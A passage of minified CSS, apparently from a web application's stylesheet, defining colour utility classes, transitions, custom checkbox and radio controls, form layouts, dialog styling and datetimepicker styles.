}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}@media screen and (max-width:100000px){input[type="checkbox"].kui-checkbox-ios{ display:none !important;} input[type="checkbox"].kui-checkbox-ios +em{ vertical-align:middle;display:inline-block;margin:0 0.8em 0 0;border:1px solid #ddd;cursor:pointer;border-radius:999px;background-color:#f6f6f6;-webkit-transition:all 0.4s;-moz-transition:all 0.4s;-o-transition:all 0.4s;-ms-transition:all 0.4s;transition:all 0.4s;box-shadow:inset 0 0 0 0px rgba(0,0,0,0.4);} input[type="checkbox"].kui-checkbox-ios +em:after{ float:left;content:'';margin:1px 0 0 1px;width:18px;height:18px;border-radius:inherit;background:#ffffff;-webkit-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-moz-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-o-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);-ms-transition:all 0.4s cubic-bezier(.54,1.85,.5,1);transition:all 0.4s cubic-bezier(.54,1.85,.5,1);box-shadow:0 1px 3px rgba(0,0,0,0.4);pointer-events:none;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#64bd63;border:1px solid #64bd63;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ background-color:#ffffff;box-shadow:0px 2px 5px rgba(0,0,0,0.3);} input[type="checkbox"].kui-checkbox-ios.size-smallx +em{ width:20px;height:10px;} input[type="checkbox"].kui-checkbox-ios.size-smallx +em:after{ width:8px;height:8px;} input[type="checkbox"].kui-checkbox-ios.size-smallx:checked +em:after{ margin-left:11px;} input[type="checkbox"].kui-checkbox-ios.size-small +em{ width:30px;height:15px;} input[type="checkbox"].kui-checkbox-ios.size-small +em:after{ width:13px;height:13px;} input[type="checkbox"].kui-checkbox-ios.size-small:checked +em:after{ margin-left:16px;} input[type="checkbox"].kui-checkbox-ios +em{ width:40px;height:20px;} input[type="checkbox"].kui-checkbox-ios +em:after{ width:18px;height:18px;} input[type="checkbox"].kui-checkbox-ios:checked +em:after{ margin-left:21px;} input[type="checkbox"].kui-checkbox-ios.size-big +em{ width:50px;height:25px;} input[type="checkbox"].kui-checkbox-ios.size-big +em:after{ width:23px;height:23px;} input[type="checkbox"].kui-checkbox-ios.size-big:checked +em:after{ margin-left:26px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em{ width:80px;height:40px;} input[type="checkbox"].kui-checkbox-ios.size-bigx +em:after{ width:38px;height:38px;} input[type="checkbox"].kui-checkbox-ios.size-bigx:checked +em:after{ margin-left:41px;} input[type="checkbox"].kui-checkbox-ios:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.red:checked +em{ background-color:#ff5722;border:1px solid #ff5722;box-shadow:inset 0 0 0 10px #ff5722;} input[type="checkbox"].kui-checkbox-ios.blue:checked +em{ background-color:#63acff;border:1px solid #63acff;box-shadow:inset 0 0 0 10px #63acff;} input[type="checkbox"].kui-checkbox-ios.green:checked +em{ background-color:#64bd63;border:1px solid #64bd63;box-shadow:inset 0 0 0 10px #64bd63;} input[type="checkbox"].kui-checkbox-ios.yellow:checked +em{ background-color:#ffc107;border:1px solid #ffc107;box-shadow:inset 0 0 0 10px #ffc107;} input[type="checkbox"].kui-checkbox-ios.grey:checked +em{ background-color:#aaa;border:1px solid #aaa;box-shadow:inset 0 0 0 10px #aaa;} input[type="checkbox"].kui-checkbox-ios.black:checked +em{ background-color:#444;border:1px solid #444;box-shadow:inset 0 0 0 10px #444;} input[type="checkbox"].kui-checkbox{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;text-align:center;border-radius:10%;display:inline-block;background-clip:padding-box;appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="checkbox"].kui-checkbox:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="checkbox"].kui-checkbox:checked{ background:#1b7e5a;border-color:#1b7e5a !important;} input[type="checkbox"].kui-checkbox:checked:before{ color:#fff;} input[type="checkbox"].kui-checkbox:checked:hover, input[type="checkbox"].kui-checkbox:checked:focus{ box-shadow:none !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#1b7e5a !important;box-shadow:0 0 0 1px #1b7e5a !important;} input[type="checkbox"].kui-checkbox.radius{ border-radius:999px;} input[type="checkbox"].kui-checkbox.size-smallx{ height:16px;font-size:9.6px;width:16px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-smallx:before{ line-height:16px;} input[type="checkbox"].kui-checkbox.size-small{ height:18px;font-size:10.8px;width:18px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-small:before{ line-height:18px;} input[type="checkbox"].kui-checkbox{ height:20px;font-size:12px;width:20px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox:before{ line-height:20px;} input[type="checkbox"].kui-checkbox.size-big{ height:26px;font-size:15.6px;width:26px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-big:before{ line-height:26px;} input[type="checkbox"].kui-checkbox.size-bigx{ height:32px;font-size:19.2px;width:32px !important;margin:0.6em 0.8em 0 0.2em;} input[type="checkbox"].kui-checkbox.size-bigx:before{ line-height:32px;} input[type="checkbox"].kui-checkbox:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox:hover, input[type="checkbox"].kui-checkbox:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="checkbox"].kui-checkbox.red:hover, input[type="checkbox"].kui-checkbox.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="checkbox"].kui-checkbox.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="checkbox"].kui-checkbox.blue:hover, input[type="checkbox"].kui-checkbox.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="checkbox"].kui-checkbox.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="checkbox"].kui-checkbox.green:hover, input[type="checkbox"].kui-checkbox.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="checkbox"].kui-checkbox.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="checkbox"].kui-checkbox.yellow:hover, input[type="checkbox"].kui-checkbox.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="checkbox"].kui-checkbox.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="checkbox"].kui-checkbox.grey:hover, input[type="checkbox"].kui-checkbox.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="checkbox"].kui-checkbox.black:checked{ background:#444;border-color:#444 !important;} input[type="checkbox"].kui-checkbox.black:hover, input[type="checkbox"].kui-checkbox.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;} input[type="radio"].kui-radio{ background:#f6f6f6;cursor:pointer;border:1px solid #ddd !important;outline:none;border-radius:999px;display:inline-block;text-align:center;-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;background-clip:padding-box;box-shadow:0 1px 2px rgba(0,0,0,0.05), inset 0px -15px 10px -12px rgba(0,0,0,0.05);appearance:none;-moz-appearance:none;-webkit-appearance:none;} input[type="radio"].kui-radio:before{ font-family:FontAwesome;content:"\f00c";color:#f6f6f6;} input[type="radio"].kui-radio:checked:before{ color:#fff;} input[type="radio"].kui-radio:checked:hover, input[type="radio"].kui-radio:checked:focus{ box-shadow:none !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#224 !important;} input[type="radio"].kui-radio.size-smallx{ font-size:9.6px;height:16px;width:16px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-smallx:before{ line-height:14px;} input[type="radio"].kui-radio.size-small{ font-size:10.8px;height:18px;width:18px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-small:before{ line-height:16px;} input[type="radio"].kui-radio{ font-size:14.4px;height:24px;width:24px !important;margin-right:0.8em;} input[type="radio"].kui-radio:before{ line-height:22px;} input[type="radio"].kui-radio.size-big{ font-size:15.6px;height:26px;width:26px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-big:before{ line-height:24px;} input[type="radio"].kui-radio.size-bigx{ font-size:19.2px;height:32px;width:32px !important;margin-right:0.8em;} input[type="radio"].kui-radio.size-bigx:before{ line-height:30px;} input[type="radio"].kui-radio:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio:hover, input[type="radio"].kui-radio:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.red:checked{ background:#ff5722;border-color:#ff5722 !important;} input[type="radio"].kui-radio.red:hover, input[type="radio"].kui-radio.red:focus{ border-color:#ff5722 !important;box-shadow:0 0 0 1px #ff5722 !important;} input[type="radio"].kui-radio.blue:checked{ background:#63acff;border-color:#63acff !important;} input[type="radio"].kui-radio.blue:hover, input[type="radio"].kui-radio.blue:focus{ border-color:#63acff !important;box-shadow:0 0 0 1px #63acff !important;} input[type="radio"].kui-radio.green:checked{ background:#64bd63;border-color:#64bd63 !important;} input[type="radio"].kui-radio.green:hover, input[type="radio"].kui-radio.green:focus{ border-color:#64bd63 !important;box-shadow:0 0 0 1px #64bd63 !important;} input[type="radio"].kui-radio.yellow:checked{ background:#ffc107;border-color:#ffc107 !important;} input[type="radio"].kui-radio.yellow:hover, input[type="radio"].kui-radio.yellow:focus{ border-color:#ffc107 !important;box-shadow:0 0 0 1px #ffc107 !important;} input[type="radio"].kui-radio.grey:checked{ background:#aaa;border-color:#aaa !important;} input[type="radio"].kui-radio.grey:hover, input[type="radio"].kui-radio.grey:focus{ border-color:#aaa !important;box-shadow:0 0 0 1px #aaa !important;} input[type="radio"].kui-radio.black:checked{ background:#444;border-color:#444 !important;} input[type="radio"].kui-radio.black:hover, input[type="radio"].kui-radio.black:focus{ border-color:#444 !important;box-shadow:0 0 0 1px #444 !important;}}.form-box{color:#444;}.form-box a{color:#5d9cec;text-decoration:none;}.form-box a:hover{color:#4a89dc;}.form-box .panel-body{position:relative;}.form-box .panel-body .line,.form-box .panel-body hr{border:none;height:1px;overflow:hidden;background:#ddd;margin:10px 30px;height:2px;background:transparent url("../../../images/common/line.png") repeat-x 0 0;}.form-box .panel-body h1,.form-box .panel-body h2,.form-box .panel-body h3,.form-box .panel-body h4,.form-box .panel-body h5{margin:0.6em 1em 0.5em 30px;padding-bottom:0.4em;border-bottom:1px solid #ddd;}.form-box.config-box .form-header{height:40px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#efefef', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-o-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);background-image:linear-gradient(60deg,#efefef 0%,#f5f7fa 100%);-pie-background:linear-gradient(to 60deg,#efefef 0%,#f5f7fa 100%);border-bottom:1px solid #ddd;}.form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:30px;font-size:14px;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-item-file{height:26px;width:26px;line-height:26px;text-align:center;border-radius:15%;display:inline-block;margin-right:10px;padding:0;color:#fff;position:relative;top:8px;}.form-box.config-box .form-header .modal-title img.x-font-icon,.form-box.config-box .form-header .modal-title .x-item-file.x-font-icon{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.form-box.config-box .form-header .modal-title img.font-icon-words,.form-box.config-box .form-header .modal-title .x-item-file.font-icon-words{font-size:10px;}.form-box.config-box .form-header .modal-title i{font-style:normal;}.form-box.config-box .form-header .modal-title img,.form-box.config-box .form-header .modal-title .x-font-icon{top:0px;}.form-box.config-box .panel-body{overflow:auto;border-radius:4px;padding:20px 0;position:absolute;left:0;right:0;top:42px;bottom:71px;margin:0;border:none;background:#fff;}.form-box .form-row{padding:3px 30px;padding-right:5px;width:auto;margin:1px 0;}.form-box .form-row:after{clear:both;}.form-box .form-row.form-group{margin:0;}.form-box .form-row label{margin-right:10px;display:inline;}.form-box .form-row input[type='radio']{display:inline-block;margin-right:10px;}.form-box .form-row input[type='text'],.form-box .form-row input[type='password'],.form-box .form-row input[type='number']{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;display:inline-block;height:28px;width:260px;color:#444;border-radius:4px;padding-left:0.5em;margin-right:10px;}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row input[type='text']:focus,.form-box .form-row input[type='password']:focus,.form-box .form-row input[type='number']:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row select{min-width:268px;}.form-box .form-row textarea{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:251px;height:100px;margin-right:10px;border-radius:2px;padding:8px;transition:none;}.form-box .form-row textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.form-box .form-row textarea:focus{box-shadow:0 0 0 3px rgba(117,161,240,0.33);}.form-box .form-row .setting-title{height:30px;line-height:30px;width:140px;margin-right:20px;padding-top:5px;padding-left:5px;float:left;position:relative;text-align:right;}.form-box .form-row .setting-title .require{color:#ff5722;font-size:20px;position:absolute;margin-top:4px;padding:0 0 0 5px;}.form-box .form-row .setting-content{float:left;position:relative;width:70%;padding:5px;border-radius:4px;border:1px solid transparent;}.form-box .form-row .setting-content input.has-btn-right{width:220px;padding-right:40px;}.form-box .form-row .setting-content .input-btn-right{padding:0;margin-left:-50px;position:absolute;width:35px;height:30px;line-height:30px;border-radius:0 4px 4px 0;}.form-box .form-row .setting-content .input-btn-right .font-icon{font-size:14px;width:20px;padding:0 !important;}.form-box .form-row .setting-content input.has-btn-right:focus + .input-btn-right{border-color:#75a1f0;border-left-color:#c7d5ef;}.form-box .form-row .font-icon{padding:0;}.form-box .form-row .user-select{margin:0.5em 0;}.form-box .form-row.form-userSelect .setting-content{background:#f8fcff;padding:10px 5px;margin-top:-5px;}.form-box .form-row.form-userSelect .desc{margin-top:10px;}.form-box .form-row.error .setting-content{background:#ffefed;border-color:#ffb3ae;}.form-box .form-row.form-color .color-picker-view i{width:20px;height:20px;margin-top:5px;box-shadow:0 0 4px #666;display:inline-block;border-radius:2px;}.form-box .form-row .select2-container{width:270px !important;}.form-box .form-row .slider.slider-horizontal{width:260px;margin-right:20px;height:30px;}.form-box .form-row .slider .tooltip{pointer-events:none;}.form-box .form-row .desc,.form-box .form-row .setting-content i{color:#9ba3af;font-style:normal;}.form-box .ztree.group-list-tree a{border:none;padding-left:3px;}.form-box .ztree.group-list-tree a:hover{border:none;}.form-box .ztree.group-list-tree li a.curSelectedNode{color:#fff;}.form-box .ztree.group-list-tree .sub-menu{float:right;display:none;line-height:20px;padding-right:7px;font-size:1.15em;color:#ddd;}.form-box .ztree.group-list-tree .hover .sub-menu{display:inline-block;color:#666;}.form-box .ztree.group-list-tree .curSelectedNode .sub-menu,.form-box .ztree.group-list-tree .hover.curSelectedNode .sub-menu{display:inline-block;color:#fff;}.form-box-title-left .form-row .setting-title{text-align:left;}body .colorpicker{z-index:99999;}body .dialog-plugin-config.dialog-no-title .aui-outer{box-shadow:0 6px 40px 0 rgba(16,17,18,0.3);border:1px solid #ccc !important;border-radius:4px;overflow:hidden;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close{color:#bbb;color:rgba(0,0,0,0.2);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active{background:rgba(0,0,0,0.12);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-min:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-max:active.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:hover.aui-close,body .dialog-plugin-config.dialog-no-title .aui-outer .aui-close:active.aui-close{color:#fff;background:#e81123;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons{padding-right:20px;height:40px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons button{margin-top:5px;margin-left:20px;padding:0 2em;height:30px;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset{background:none;border:none;box-shadow:none;padding:0px 10px;color:#bbb;}body .dialog-plugin-config.dialog-no-title .aui-outer .aui-buttons .btn-config-reset:hover{color:#2196F3;background:#eaf5ff;}div.xdsoft_datetimepicker{border-top:2px solid #39f;padding:0;height:250px;color:#666;}div.xdsoft_datetimepicker .xdsoft_label,div.xdsoft_datetimepicker .xdsoft_month{text-align:center;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_label:hover,div.xdsoft_datetimepicker .xdsoft_month:hover{text-decoration:none;background:#e6f2ff;}div.xdsoft_datetimepicker .xdsoft_label:hover span,div.xdsoft_datetimepicker .xdsoft_month:hover span{color:#20a0ff;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select{box-shadow:0px 2px 10px rgba(0,0,0,0.2);border:1px solid rgba(0,0,0,0.1);max-height:300px;height:200px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_monthselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_monthselect{right:0px;width:90px;}div.xdsoft_datetimepicker .xdsoft_label > .xdsoft_select.xdsoft_yearselect,div.xdsoft_datetimepicker .xdsoft_month > .xdsoft_select.xdsoft_yearselect{right:0px;width:56px;}div.xdsoft_datetimepicker .xdsoft_scrollbar >.xdsoft_scroller{background:rgba(0,0,0,0.3) !important;}div.xdsoft_datetimepicker .xdsoft_calendar td,div.xdsoft_datetimepicker .xdsoft_calendar th{height:30px;text-align:center;background:none;border:none;}div.xdsoft_datetimepicker .xdsoft_calendar td div,div.xdsoft_datetimepicker .xdsoft_calendar th div{padding:0;}div.xdsoft_datetimepicker .xdsoft_calendar th{background:#eee;color:#444;font-weight:400;}div.xdsoft_datetimepicker .xdsoft_datepicker{width:220px;margin-right:10px;}div.xdsoft_datetimepicker .xdsoft_datepicker.active+.xdsoft_timepicker{margin:0;}div.xdsoft_datetimepicker .xdsoft_timepicker{width:70px;border-left:1px solid #ddd;background:#fbfdff;margin:0;margin-left:-1px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_prev,div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_next{margin-left:20px;}div.xdsoft_datetimepicker .xdsoft_timepicker 